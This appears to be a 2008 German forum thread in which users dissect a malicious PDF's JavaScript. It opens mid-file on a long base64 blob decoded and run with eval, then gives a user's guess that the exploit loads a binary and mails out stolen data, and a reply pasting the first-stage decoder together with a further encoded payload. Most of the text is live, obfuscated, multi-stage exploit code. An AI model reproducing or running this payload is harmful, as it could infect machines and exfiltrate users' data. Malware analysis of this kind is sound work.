jNkUk9UZGtjR0ZNZUVnM2QzRktPRjlNTlhCTWNuSTVXalpMTVc1RWRsRkVUSFpRVTFKWVVGTkhTMUU1WWpZMVVrYzJXV0pTUzFGdVREVjRNSGN3T1VkemFXMU5Wblo0YkV3Mk9WRlJjMDFFVlVobE4zVjFORGxpWDJGRU5rczJkMHh3VUY5M1gweGlRbDgwTmtSeldEQjNNRGszWkhCaFRIYzFkRTFpYVVWTVZtNVhUSEp5T1ZCZk5VOU1jalJoVTJSd01GOTRTRGQzY1VvNFgwdzFjRzUzY0hoM1lrdEpZblZrTVRCNFgwMUVWVWhsTjNWMU5EbGlYMGhmWDNCaGR6VjJlRm93WkRaSGMybHRUVloyZUd4TU5qVnROblZHVTJRMFpsOUVTbEV3ZHpBNU1HSTFPV1I0WkRSc2NYQm9UVFZLWjJaQ1JqRlJjSE5rVVZGemNrZEVWV2xIZUdSNFNVeFlTR05DTkRGUVoxQnZkekE1T1ZFd2NqbGFVWE5wTjNoek5HeHhjR2hOTlVwblprSkdZVkZ3YzE5SFJFcFJSM2g0WDB4M05YUk5ZbWxGVEZadVZ6RnpTa2RNZUhJNVdqQmtVVWQ0ZUY5TWVHUTBiSEZ3YUUwMVNtZG1Ra1l4VVhCelpGRlJjMDlIUkZWcFIzYzFkRTFpYVVWTVZtNVhNWE5LUjB4NGNqbGFNR1E1ZFhWNE9XUjNOWFJOWW1sRlRGWnVWekZ3U2tkTWVISTVTVEJrVVVkM1VUbGtZbEIzWTBjeWExTnhTbmd3ZHpBNU4yUndZVXhFTkVGQlVuQnljbUp1T1ZGUmMwRnVYelZsVFY5d01VUTJaRmhXY25ZeGJUWktTRVJ5ZGpGdE5rcElVM0prU2tkM2RuaHlOalpRWDBRMFFVRlNjSEp5WW00MWRWODFOV3cyZG5oTWVISTVVbEV5TUZaV1NsRkhSRFJCUVZKd2NuSmliamt6Y25JNWFsVXlNbE0yVVZGdVFqQTVVblYxVVUxU1gwZzVOalkyZDJKd1dXSkhObUZFTm5Oa1IzYzBjRFkyTmtaVFlsOUlPVFkyTmtSTWNHWkVWVFpHY2pZMlZtNWlOWEJmZDFGbFJGSndkbVpSYzFocWVGOTFUVWMxTWtkRU5FRkJVbkJ5Y21KdVpISjNNRGxSZFhOa1RFUTBabHBpU0ZsZmNtUktSM0o0SnlrNw=="\);
le3nipQQ9R=cT5JMLJSBS\(Kjk05y\);
eval\(le3nipQQ9R\);

//ok, hab den code a weng untersucht

es schaut danach aus als ob via javascript ne binary nachgeladen wird (weiß bis jetz ned genau wie, evt. n buffer overflow oder sowas [wird n array angelegt mit nem index von 1200 + ich denke darin is code])
diese binary erweitert das script mit nem object namens "util"
mit dem object kann man, so wies ausschaut, beliebig code ausführen (in dem script wohl ne weitere binary)

was ich aber mit sicherheit sagen kann is, dass dieser exploit irgendwelche sachen ausließt und per mail vesendet

is ganz interessant, vielleicht mag N0S mal a weng tiefer graben ^^
------
atm mach ich erstmal nen syscheck, hab keine sandbox benutzt (aber zum glück kein adminaxx )

N0S · 30. Dezember 2008

AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

Murdoc dieses 1. Javascript in dem pdf dient nur zum entschlüsseln eines weiteren Javascripts und das 2. Javascript entschlüsselt wieder ein Javascript. Das 3. Javascript ist dann das eigentliche Exploit.
Wer diese Seite hostet ist sicher kein Anfänger, echt gut gemacht. Interessant ist auch das die Obfuskation des Javascript Codes bei jedem PDF neu erzeugt wird. Das macht es den Antivirenherstellern ziemlich schwer das zu erkennen...
So sieht das erste Script bei mir aus:

PHP:

                                   var  ghVLJIEqm5Yq = "" ;

                                var  bcTm3E = "" ;

                                function  VgYbPlrsoUtZB (  HEn9LnzMIYY  ) {

                                    var  zUh0LUEtKr5xLr  =  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" ;

                                    var  bOrGwSfiKY ,  UR71r2VYBq4Pj ,  CoLcfKC ,  yS1e9i ,  VytzFhKrMf4 ,  YWQVe9ULNHTi5 ,  gN2dX ,  YQcq8whUblu ,  rKywSSH  =  JlYpEdDFGkrs  =  0 ,  aiJQQn3Ch  =  "" ,  xVgWivmTneeHN  = [];

                                     HEn9LnzMIYY  +=  "" ;

                                    do {

                                         yS1e9i  =  zUh0LUEtKr5xLr . indexOf ( HEn9LnzMIYY . charAt ( rKywSSH ++));

                                         VytzFhKrMf4  =  zUh0LUEtKr5xLr . indexOf ( HEn9LnzMIYY . charAt ( rKywSSH ++));

                                         YWQVe9ULNHTi5  =  zUh0LUEtKr5xLr . indexOf ( HEn9LnzMIYY . charAt ( rKywSSH ++));

                                         gN2dX  =  zUh0LUEtKr5xLr . indexOf ( HEn9LnzMIYY . charAt ( rKywSSH ++));

                                         YQcq8whUblu  =  yS1e9i << 18  |  VytzFhKrMf4 << 12  |  YWQVe9ULNHTi5 << 6  |  gN2dX ;

                                         bOrGwSfiKY  =  YQcq8whUblu >> 16  &  0xff ;

                                         UR71r2VYBq4Pj  =  YQcq8whUblu >> 8  &  0xff ;

                                         CoLcfKC  =  YQcq8whUblu  &  0xff ;

                                        if ( YWQVe9ULNHTi5  ==  64 ) {

                                             xVgWivmTneeHN [ JlYpEdDFGkrs ++] =  String . fromCharCode ( bOrGwSfiKY );

                                        } else if ( gN2dX  ==  64 ) {

                                             xVgWivmTneeHN [ JlYpEdDFGkrs ++] =  String . fromCharCode ( bOrGwSfiKY ,  UR71r2VYBq4Pj );

                                        } else {

                                             xVgWivmTneeHN [ JlYpEdDFGkrs ++] =  String . fromCharCode ( bOrGwSfiKY ,  UR71r2VYBq4Pj ,  CoLcfKC );

                                        }

                                    } while ( rKywSSH  <  HEn9LnzMIYY . length );

                                     aiJQQn3Ch  =  xVgWivmTneeHN . join ( "" );

                                     aiJQQn3Ch  =  X3TPUwhKg ( aiJQQn3Ch );

                                    return  aiJQQn3Ch ;

                                }

                                function  X3TPUwhKg  (  bOrGwSfiKY  ) {

                                    var  UR71r2VYBq4Pj  = [],  CoLcfKC  =  yS1e9i  =  HEn9LnzMIYY  =  VytzFhKrMf4  =  YWQVe9ULNHTi5  =  0 ;

                                     bOrGwSfiKY  +=  "" ;

                                    while (  CoLcfKC  <  bOrGwSfiKY . length  ) {

                                         HEn9LnzMIYY  =  bOrGwSfiKY . charCodeAt ( CoLcfKC );

                                        if ( HEn9LnzMIYY  <  128 ) {

                                             UR71r2VYBq4Pj [ yS1e9i ++] =  String . fromCharCode ( HEn9LnzMIYY );

                                             CoLcfKC ++;

                                        } else if (( HEn9LnzMIYY  >  191 ) && ( HEn9LnzMIYY  <  224 )) {

                                             VytzFhKrMf4  =  bOrGwSfiKY . charCodeAt ( CoLcfKC + 1 );

                                             UR71r2VYBq4Pj [ yS1e9i ++] =  String . fromCharCode ((( HEn9LnzMIYY  &  31 ) <<  6 ) | ( VytzFhKrMf4  &  63 ));

                                             CoLcfKC  +=  2 ;

                                        } else {

                                             VytzFhKrMf4  =  bOrGwSfiKY . charCodeAt ( CoLcfKC + 1 );

                                             YWQVe9ULNHTi5  =  bOrGwSfiKY . charCodeAt ( CoLcfKC + 2 );

                                             UR71r2VYBq4Pj [ yS1e9i ++] =  String . fromCharCode ((( HEn9LnzMIYY  &  15 ) <<  12 ) | (( VytzFhKrMf4  &  63 ) <<  6 ) | ( YWQVe9ULNHTi5  &  63 ));

                                             CoLcfKC  +=  3 ;

                                        }

                                    }

                                    return  UR71r2VYBq4Pj . join ( "" );

                                }

 
                 ghVLJIEqm5Yq =  VgYbPlrsoUtZB ( "Wm5WdVkzUnBiMjRnZEZocU5WVmFZMjBvVmxWeGFEUlpaRzF4WWlsN0lISmxkSFZ5YmlCVGRISnBibWRiSjJaeWIyMURhR0Z5UTI5a1pTZGRLRlpWY1dnMFdXUnRjV0lwTzMwZ1puVnVZM1JwYjI0Z2IxVjZWWFUyZEZSd1VWWktLRzVRVlZCSFRVMHBleUIyWVhJZ2NuVTVVR2hJZFVkQlYyczlNQ3dnWW5ScVRVOXlZbTVxYnoxdVVGVlFSMDFOTG14bGJtZDBhQ3dnYkc0eU9IUjJZajB4TURJMExDQnRPRE01VUZOamNDd2dRMEpWVnpWRWMxTTJWVWR2U1c0c0lHMXdRVEZyYlQwbkp5d2djM1ZzUlVwRlBYSjFPVkJvU0hWSFFWZHJMQ0JXZUhGTFVrNDljblU1VUdoSWRVZEJWMnNzSUc1SGMydHJPVm8wZG1Nd1BYSjFPVkJvU0hWSFFWZHJMQ0I0TUZaYWRHSlVaWEZ1ZEdnOVFYSnlZWGtvTmpNc01Dd3lMREl5TERFNUxETTRMREV4TERNeExESXdMRE01TERBc01Dd3dMREFzTUN3d0xESTNMRFUwTERReExETTJMRFEzTERRMkxEVTJMREk0TERVeExEVTVMRE13TERFMkxEVXNOaklzTVRnc01qUXNNelFzTlRJc01qa3NNU3cwTUN3ME1pd3hNaXcxT0N3MU1Dd3pOeXcyTVN3d0xEQXNNQ3d3TERRc01DdzJMRFE1TERVekxETTFMREl6TERFMExEUXpMREl4TERjc09DdzBOQ3d5TlN3ME5Td3pMREkyTERNekxETXlMRFUxTERZd0xEUTRMREV6TERFMUxERTNMRFUzTERrc01UQXBPeUJtYjNJb1EwSlZWelZFYzFNMlZVZHZTVzQ5VFdGMGFDNWpaV2xzS0dKMGFrMVBjbUp1YW04dmJHNHlPSFIyWWlrN1EwSlZWelZFYzFNMlZVZHZTVzQrY25VNVVHaElkVWRCVjJzN1EwSlZWelZFYzFNMlZVZHZTVzR0TFNsN0lHWnZjaWh0T0RNNVVGTmpjRDFOWVhSb0xtMXBiaWhpZEdwTlQzSmlibXB2TEd4dU1qaDBkbUlwTzIwNE16bFFVMk53UG5KMU9WQm9TSFZIUVZkck8yMDRNemxRVTJOd0xTMHNZblJxVFU5eVltNXFieTB0S1hzZ2JrZHphMnM1V2pSMll6QjhQU2g0TUZaYWRHSlVaWEZ1ZEdoYmJsQlZVRWROVFM1amFHRnlRMjlrWlVGMEtITjFiRVZLUlNzcktTMDBPRjBwUER4V2VIRkxVazQ3SUdsbUtGWjRjVXRTVGlsN0lHMXdRVEZyYlNzOWRGaHFOVlZhWTIwb05UWmVia2R6YTJzNVdqUjJZekFtTWpVMUtUc2dia2R6YTJzNVdqUjJZekErUGowNE95QldlSEZMVWs0dFBUSTdJSDBnWld4elpTQjdJRlo0Y1V0U1RqMDJPeUI5SUgwZ2ZTQmxkbUZzS0cxd1FURnJiU2s3SUgwZ2IxVjZWWFUyZEZSd1VWWktLQ2RxVEVFMGIxazVaV1ozT1ROaVVtZ3paamhMTkROalkwNUFXVXhPVWxOd1lWSlJYMjQyZEhReVVsRmZialowZERKU1VWOXVOblIwTWxKUlh6Sk5ZemxLVWxGUk1qWlJjVXBTVVVOdVptdGxNVkpSWHpGcVZHVXhVbEZmTVdweFN6SlNVVGczVFcxME1sSlJPRGQ2ZEhReVVsRTROMWQ0WlVwU1VUZzNNWEZMYmxKUlF6ZE5ZM0pLVWxGRE4wMTRPVGRTVVY4eFYxcHhOMUpSWHpkTllrczNVbEU0TjAxak9UZFNVVU51VmxFNU4xSlJPRGMyUXprM1VsRTRNVTE0TVc1U1VWOXVla1p5TWxKUk9ERk5lREZ1VWxGRGJscGpjbTVTVVRnM1RYQjBNbEpST0RkTll6bEtVbEZEYmxaUk9UZFNVVU5LVTNGME1sSlJRMjU1TVhSdVVsRTROM2xEWlRKU1VWOHlkbkYwTWxKUk9EZE5XVXN5VWxFNE4wMWpPVGRTVVRoS2VIaHhibEpSUTBwVFVUbEtVbEZSYm5ZeGRHNVNVVU51ZFVOTE1sSlJYekoyVVdVeVVsRTROMDFaY1RkU1VUZzNUV001TjFKUk9FcDRlSEZ1VWxGRFNsTlJjbTVTVVZGS2VGTjBibEpST0RKcVVYRTNVbEZmTW5aVU1UZFNVVGczVFhBeE4xSlJPRGROWXprM1VsRTRTbmg0Y1c1U1VVTktVMUZ5TWxKUlh6SnFNWFJ1VWxGZk1rMUNTekpTVVY4eWRqRnhOMUpST0RkTmJYRktVbEU0TjAxak9UZFNVVGhLZUhoeGJsSlJRMHBUUmprM1VsRkRNbHBUZEc1U1VWOHllRXh4YmxKUlh6SjJVWFJ1VWxFNE4wMUNTekZTVVRnM1RXTTVOMUpST0VwNGVIRnVVbEU0U2sxNE9VcFNVVjgzZGtaeE4xSlJPREY0UW5SS1VsRkRibVpEUzI1U1VVTTNka05sU2xKUk9EY3hjWEZ1VWxFNE4wMWpaVGRTVVVOS2VWRTVOMUpST0RGNGVIRnVVbEZEYmxack9VcFNVVGczVjFsbFNsSlJPRGRhVTB0dVVsRkRibFpVT1c1U1VVTTNkbFJsU2xKUlh6SjJWR1V4VWxFNE4wMTRNVzVTVVRnM1RXTTVOMUpSWHpGMlZEazNVbEZETjNWMFpURlNVVGd4VFcxcE1sSlJVVzR4Y1hSdVVsRTROMDFqT1RkU1VVTnVabEU1TjFKUlF6YzJRMlZLVWxGRE1uaDRNVzVTVVVNeVRYaDBTbEpSUTI1bVZEazNVbEZSU2sxWlpVcFNVVGd5YWpGMGJsSlJPRGROWXprM1VsRkRTazFqT1RkU1VUaEtlSGd4YmxKUlh6RjFSamxLVWxGRFNtWlJhVGRTVVVOS2VIZ3hibEpSWHpKMlJuSnVVbEU0TjAxVFN6ZFNVVGczVFdNNU4xSlJPRXA0WTNKS1VsRkRNakZyT1RkU1VVTktObEU1TjFKUlVVcDVYMHN5VWxGRE1qRXhTMHBTVVRnM1YxazVOMUpSWHpGNFRIUnVVbEU0TjAxak9UZFNVVGd4ZUZreE1sSlJRMjVXYXprM1VsRTROelpEWlVwU1VUZzNXbE5MYmxKUlEyNVdWRGx1VWxGRE4zWlVaVXBTVVRoS1RYQjBibEpST0RkTll6azNVbEZmTVhWUk9UZFNVVU5LZGxGcE1WSlJPRXA0WTNKS1VsRmZOMGx0T1VwU1VVTktTVzB4YmxKUk9ESnFWSEpLVWxGUlNrMU1TMHBTVVVOS1NVSTVOMUpST0VwNGVERnVVbEZmTVhWR2NqSlNVVU5LWmxGbFNsSlJRMHA0ZURGdVVsRmZNblpHY201U1VUZzNUVzF5U2xKUk9EZE5ZemszVWxFNE4wMVRTMjVTVVRneGVGa3hNbEpSUTI1V2F6azNVbEU0TjNaRFpVcFNVVGczYzFOTGJsSlJRMjVXVkRsdVVsRkROM1pVWlVwU1VVTTNUWEIwYmxKUk9EZE5ZemszVWxGZk1YVlJPVGRTVVVOdVZrTXhNbEpSUXpkTldXVktVbEU0TjFwVFMyNVNVVU51VmxRNWJsSlJRemQyVkdWS1VsRTROMDF3ZEc1U1VUZzNUV001TjFKUk9FcGFZemszVWxGRFNuTkNhVzVTVVY4eVdtTnlTbEpSWHpKYVkzSktVbEZmTWxwamNrcFNVVjh5V21OeVNsSlJYekkyUm5SS1VsRkRTblZST1VwU1VVTnVWbFJ5U2xKUlh6SnpiVXR1VWxGRFNuTlpNVEZTVVY4eVRWa3hNbEpSUTI1V1ZHVktVbEZEYmxaeGRESlNVVGczZGw5eE1sSlJRMHA2UmpGdVVsRkRTbE5SY2pKU1VUZ3hTWGd4YmxKUlEyNVdkSEl5VWxGRE4zbGZjVXBTVVRnM1NVeDBibEpSUTBwVFEzUktVbEU0TVZOR01XNVNVVGczU1cwNU4xSlJYemRKV1hSS1VsRTRTbVpVY1c1U1VWOXVla05sTjFKUlF6SkpZM0pLVWxGZk4wbENaVEZTVVRnM2FrTkxNVkpSUXpkTlkwc3lVbEU0TW5OaVpXNVNVVGczZGw5eFNsSlJReko1VkVzM1VsRTROMGxqT1RKU1VUaEtUVmt4TjFKUk9ESmFjREZ1VWxFNE1ubDBhVzVTVVRneGVFSmxNbEpSUTBwMWNVdEtVbEZmTWxaR01XNVNVVU5LZFVZeGJsSlJPRGRKYlRsS1VsRmZNVk5yY1RKU1VUZzNOa1l4YmxKUlEyNVdRMmx1VWxGRE56WlVaVzVTVVZFeWVsRnlTbEpST0RkWGVERnVVbEU0TjBsNE1XNVNVVU5LZVZSTFNsSlJRekp6UWpreVVsRTROMDFqY201U1VUZ3lWM0IwYmxKUk9ESnFRMHN5VWxGRFNuaFpNVEpTVVRoS05sUnBOMUpST0VwcVF6a3lVbEU0TjAxWlpUSlNVVkZ1VmtZeE1WSlJVVzVxY3pGdVVsRkRNazF0UzBwU1VWRnVabFJ4TjFKUlEyNVdSa3N4VWxGUk1tcEdTMjVTVVVOdVRWb3hNbEpSVVc1V2MzRXlVbEZEYmtsNFN6SlNVVU51TmxSTE4xSlJRMjV6ZUhFM1VsRkRibHBDY1RkU1VWRnVka1pMYmxKUlF6Sk5XblF5VWxGRGJrMTRkRXBTVVVOdVZrWkxNbEpSVVc1cVZFczNVbEZSYm1wR01URnZYMkl4VDBZNE0zcHdVelJUZUdNNGJHTm9RSFU0VERGT1dWOHhZMmhMTkROalkwNUFXVXhPVWxOd1lWSlJYeko0Y0V0S1VsRmZNbmh3UzBwdlgySXhabGxaVGs5UGFHaE1WREV5YmtZNE0zcHdjR1UzYUhGb2FIVlRUbkJhUXpONGVGazBVVUpvUjJWWldXNHpTMmhsTTFwTU5FdDFkRFJMVEV4b1VsTlRORk40WXpoc1kyaEFkVGhNTVU1Wlh6RmpiRk5vVW14alpWWlRURk5LV21oZlZreERaVFJaYUdWdFkwdG9NV3BvVGpFNGNsOU1kRGhMU25Wb00xSmpNMjVvVTNFNGVWTkxVbTVHT0RONmNIQm9hRUpaVGt4ME9FdEtkV2d6VW1NemJtaFRjVGg1VTB0U00yczRORzl0WHpSNlRGbG9OMU5UTWpoR1kyVjNWbkUwYkVKZllUWmlPRGczYURFMFUzaGpPR3hqYUVCMU9Fd3hUbGxmTVdOc1lrNTFRbU5PVmtJNE9ETmFURjlxUzFNMFUzaGpPR3hqYUVCMU9Fd3hUbGxmTVdOc1UyaFNiR05sVmxOb1RFcGFhRjl1YzE4NGQzZG9aVXRyWHpSM1dsbE1PR05aYURkaVh6ZzBSbU5sWDNFeFMyWnhNVEpxY1V0Zk5tSTRPRGRvZEU1V1RHTmxOR3RmTkhkYVkxOHphRmt6ZW5WeE5HeENYMkZzUWtOT2FHaHhhRkphWDJGNFFrTk9iRXhmWDNkV2NXVmxRbDlmZDNrNFUycFdTemd5ZDBzeWVuRXhNbTVmV1VzMFZuZGZibGxaVG5wb1kwOTNlVGhzVEd0Zk5IZGFZMTlxVEVFMGIxazVaV1ozT1ROaVVtZ3paamhETkd4Q1gyRkNlV05IZUhnNFVtdE1RMmhUV21oVGIwTnhNbE5VWWw5dlgwc3hVMTlMTVZOZlN6RnZWbkJoVTE5TE1WTmZjV0UwVkhjeFUxOUxNVzlXY0dFeE1URXhNVEV4TVRGVVlsOXZNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVZSaVgyOHhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVzlXY0dFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1XOVdjR0V4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4Y1dFMFZGTXhNVEV4TVRFeE1URXhNVEV4TVRFeE1XOVdjR0V4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhWR0pmYnpFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRGdlZrczBWa3hNYUROeFEwNTNiRXcwU2xOd1lWSjBTMjVxY1RFeVNrSlRURUo1WTBkNGVEaFNhMHhEYUZOYWFGOXVSbWcwTTIxTU5IZFNXV2hQT0V4dk9IZzVia1J3WDE5M2NXSkxUMFk0TTNwd1UwQjFXak14UjNCM1UwOVBhR1YyY0hkS2VrSTRNMU5UZDE5dWNYQmxkV3hqTTFaTVkyZ3pjRk5vTW5oeWJuQnRhVGhMVkV4bGRYUTFORFppY1RJM2RUbHZWWGxoVEU5UlRHOU5lVU5IYUZOME5GTkhjalJ5WXpOQWQzRmlTMDl6WHpoM2QyaGxUekZ3TTBkak1VQm1iVjl1ZW5OalIxVkNOVTh6UzJobE0xcE1ORXQ1Y0RKZlVVeHZUWGxEUjJoVGREUlRSM0kwY21NelFIZFdRek5IWXpGQVptMWZibnB6WTBkVlFqVlBUMVozVTA5VVRHVjFkRFUwTm1KeE1qZDFPVzlWZVVFeFRIQndNMGRqTVVCbWJWOXVlbk5qUjFWQ05VOVBPREZoYjJKb2JtdDRVVTVXVkhSbFNFSTFiMUJzWWs1MVFtTk9Wa0k0T0ROYVRGOXFTM2RsVkhnNVMxaG9UREYyVEhSU2RsSmxRRzFTY0RKM1ZqRmhlbU5NTkhWQ1EyaFBWRXhsZFhRMU5EWmljVEkzZFRsdlZYbEJNVTg0WDJGS1kwTm9RR0k0T0dWc1RHRmlZbkp2ZVZNNU5EaFRkMTlQVmw5aFpsbFpUazlSTldoNWVXVTNZbTFST0hSTVpUSXdRbWhvVHpneFlXb3hYekpBY0hRemFtdE1Na0IxTVdGbVdWbE9UM1ExTkdoak5VZDBlVGcwYldKcFlVeHhkelF6WTJOT1FGbE1UbEpUY0dGU1VWOXVOblIwTWxKUlgyNDJkSFF5VWxGZmJqWjBkREpTVVY4eVRXTTVTbEpSVVRJMlVYRktVbEZEYm1aclpURlNVVjh4YWxSbE1WSlJYekZxY1VzeVVsRTROMDF0ZERKU1VUZzNlblIwTWxKUk9EZFhlR1ZLVWxFNE56RnhTMjVTVVVNM1RXTnlTbEpSUXpkTmVEazNVbEZmTVZkYWNUZFNVVjgzVFdKTE4xSlJPRGROWXprM1VsRkRibFpST1RkU1VUZzNOa001TjFKUk9ERk5lREZ1VWxGZmJucEdjakpTVVRneFRYZ3hibEpSUTI1YVkzSnVVbEU0TjAxd2RESlNVVGczVFdNNVNsSlJRMjVXVVRrM1VsRkRTbE54ZERKU1VVTnVlVEYwYmxKUk9EZDVRMlV5VWxGZk1uWnhkREpTVVRnM1RWbExNbEpST0RkTll6azNVbEU0U25oNGNXNVNVVU5LVTFFNVNsSlJVVzUyTVhSdVVsRkRiblZEU3pKU1VWOHlkbEZsTWxKUk9EZE5XWEUzVWxFNE4wMWpPVGRTVVRoS2VIaHhibEpSUTBwVFVYSnVVbEZSU25oVGRHNVNVVGd5YWxGeE4xSlJYekoyVkRFM1VsRTROMDF3TVRkU1VUZzNUV001TjFKUk9FcDRlSEZ1VWxGRFNsTlJjakpTVVY4eWFqRjBibEpSWHpKTlFrc3lVbEZmTW5ZeGNUZFNVVGczVFcxeFNsSlJPRGROWXprM1VsRTRTbmg0Y1c1U1VVTktVMFk1TjFKUlF6SmFVM1J1VWxGZk1uaE1jVzVTVVY4eWRsRjBibEpST0RkTlFrc3hVbEU0TjAxak9UZFNVVGhLZUhoeGJsSlJPRXBOZURsS1VsRmZOM1pHY1RkU1VUZ3hlRUowU2xKUlEyNW1RMHR1VWxGRE4zWkRaVXBTVVRnM01YRnhibEpST0RkTlkyVTNVbEZEU25sUk9UZFNVVGd4ZUhoeGJsSlJRMjVXYXpsS1VsRTROMWRaWlVwU1VUZzNXbE5MYmxKUlEyNVdWRGx1VWxGRE4zWlVaVXBTVVY4eWRsUmxNVkpST0RkTmVERnVVbEU0TjAxak9UZFNVVjh4ZGxRNU4xSlJRemQxZEdVeFVsRTRNVTF0YVRKU1VWRnVNWEYwYmxKUk9EZE5ZemszVWxGRGJtWlJPVGRTVVVNM05rTmxTbEpSUXpKNGVERnVVbEZETWsxNGRFcFNVVU51WmxRNU4xSlJVVXBOV1dWS1VsRTRNbW94ZEc1U1VUZzNUV001TjFKUlEwcE5ZemszVWxFNFNuaDRNVzVTVVY4eGRVWTVTbEpSUTBwbVVXazNVbEZEU25oNE1XNVNVVjh5ZGtaeWJsSlJPRGROVTBzM1VsRTROMDFqT1RkU1VUaEtlR055U2xKUlF6SXhhemszVWxGRFNqWlJPVGRTVVZGS2VWOUxNbEpSUXpJeE1VdEtVbEU0TjFkWk9UZFNVVjh4ZUV4MGJsSlJPRGROWXprM1VsRTRNWGhaTVRKU1VVTnVWbXM1TjFKUk9EYzJRMlZLVWxFNE4xcFRTMjVTVVVOdVZsUTVibEpSUXpkMlZHVktVbEU0U2sxd2RHNVNVVGczVFdNNU4xSlJYekYxVVRrM1VsRkRTblpSYVRGU1VUaEtlR055U2xKUlh6ZEpiVGxLVWxGRFNrbHRNVzVTVVRneWFsUnlTbEpSVVVwTlRFdEtVbEZEU2tsQ09UZFNVVGhLZUhneGJsSlJYekYxUm5JeVVsRkRTbVpSWlVwU1VVTktlSGd4YmxKUlh6SjJSbkp1VWxFNE4wMXRja3BTVVRnM1RXTTVOMUpST0RkTlUwdHVVbEU0TVhoWk1USlNVVU51Vm1zNU4xSlJPRGQyUTJWS1VsRTROM05UUzI1U1VVTnVWbFE1YmxKUlF6ZDJWR1ZLVWxGRE4wMXdkRzVTVVRnM1RXTTVOMUpSWHpGMVVUazNVbEZEYmxaRE1USlNVVU0zVFZsbFNsSlJPRGRhVTB0dVVsRkRibFpVT1c1U1VVTTNkbFJsU2xKUk9EZE5jSFJ1VWxFNE4wMWpPVGRTVVRoS1dtTTVOMUpSUTBwelFtbHVVbEZmTWxwamNrcFNVVjh5V21OeVNsSlJYekphWTNKS1VsRmZNbHBqY2twU1VWOHlOa1owU2xKUlEwcDFVVGxLVWxGRGJsWlVja3BTVVY4eWMyMUxibEpSUTBweldURXhVbEZmTWsxWk1USlNVVU51VmxSbFNsSlJRMjVXY1hReVVsRTROM1pmY1RKU1VVTktla1l4YmxKUlEwcFRVWEl5VWxFNE1VbDRNVzVTVVVOdVZuUnlNbEpSUXpkNVgzRktVbEU0TjBsTWRHNVNVVU5LVTBOMFNsSlJPREZUUmpGdVVsRTROMGx0T1RkU1VWODNTVmwwU2xKUk9FcG1WSEZ1VWxGZmJucERaVGRTVVVNeVNXTnlTbEpSWHpkSlFtVXhVbEU0TjJwRFN6RlNVVU0zVFdOTE1sSlJPREp6WW1WdVVsRTROM1pmY1VwU1VVTXllVlJMTjFKUk9EZEpZemt5VWxFNFNrMVpNVGRTVVRneVduQXhibEpST0RKNWRHbHVVbEU0TVhoQ1pUSlNVVU5LZFhGTFNsSlJYekpXUmpGdVVsRkRTblZHTVc1U1VUZzNTVzA1U2xKUlh6RlRhM0V5VWxFNE56WkdNVzVTVVVOdVZrTnBibEpSUXpjMlZHVnVVbEZSTW5wUmNrcFNVVGczVjNneGJsSlJPRGRKZURGdVVsRkRTbmxVUzBwU1VVTXljMEk1TWxKUk9EZE5ZM0p1VWxFNE1sZHdkRzVTVVRneWFrTkxNbEpSUTBwNFdURXlVbEU0U2paVWFUZFNVVGhLYWtNNU1sSlJPRGROV1dVeVVsRkRibE5yY1RkU1VWRXljM2d4YmxKUlVXNDJWSEZ1VWxGRGJrbGFNVEpTVVZFeVZtc3hOMjlmWWpGUFJqZ3plbkJUTkdwaVFVNTJTMHhoVEhGVE1qRmlNVEpxY1RFeWFsWXhZV1paV1U1UFVVTlNVbmRaTkZCVE0yOVBPREZoYTNnNGFHMTVhVWN5WXpoQWMyeFRhRkpzWTJWV1UweGhUbkZ3TW01eGNEUnNRbDloVW5BMU56SjVaV2d4Y3pneGNscFJVbTFqWVdGTWNWTTBhbUpCVG5aTFRHRm9jVk5mZFd4bFpUaDRRMDl4V1VGZmFqRlJNakZmWWpGUFJqZ3plbkJ3TTBkak1VQm1iVjl1ZW5OalIxVkNOVTlQT0RGaGRXeG9aVFp0YUROcVkweGZiMUYzTkZOeFN6RnFVWGMwVTNGTE1XcFVkMTl1Y1hBelIyTXhRR1p0WDI1NmMyTkhWVUkxVDA4NE1XRTRlVU0zZGw5QlNrdFRjRE5IWXpGQVptMWZibnB6WTBkVlFqVlBPSEYzWlZSNE9VdFlhRXd4ZGt4MFVuWlNaVUJ0VEdJeFQwWTRNM3B3WW05Q2JGbEhSM0F4WlZOck5UaGxkV016VHpneFlVdFJOV2g1ZVdVM1ltMVJPSFJNWlRJd1FtaG9UemhUWVdveFgyNXFjVEV5YW5GTFgyVjBYMDVyYlZGdU9IVXhZVXBTV1U1UE1YQTBiRUpmWVVwNE0wZDJSa3hIVmxvelUycFdjV1ZGVEhKdVNsTnBORVIzZEc5Q2JGbEhSM0F4WlZOck5UaGxkV016YmtaWlFHSmFjV1YwWWxGQU5GWjNYMDlXWDJGclkxRkFVM1JqVDBwNE0wZDJSa3hIVmxvemJFODRNV0Z2WW1odWEzaFJUbFpVZEdWSVFqVnZVSEJpWDA5ME5UUm9ZelZIZEhrNE5HMWljakZQT0Y5aFRIQndaWFZzWXpOV1RHTm9NM0IzT0RSQ2NtaEFVMlV6YlZOM1gwOVdYMkZtV1ZsT1R6aE1NbFJqUXpneGRYSXphSFZNYjNaSE9VOVBPREZoYkhCZlRqTkdPRGhTV2pobGVuZ3paWHB0T0RobGJGbE1WbEpqYjFaQ09EZ3pXa3hmZDFZeFlXaHdNVzkxZVV4TFNHMW9hRFJ3UVc1eWVXRmhUSEYzYUdweE16Uk9VMUZIUUdoak9GUmFkRkpRYkhCT1VuQmZhR3h0YUdWTFIxTnNjMUppWlRoVWNHRjNWakZoWmxsWlRrOXpVVEpyYUdWb2RqRk1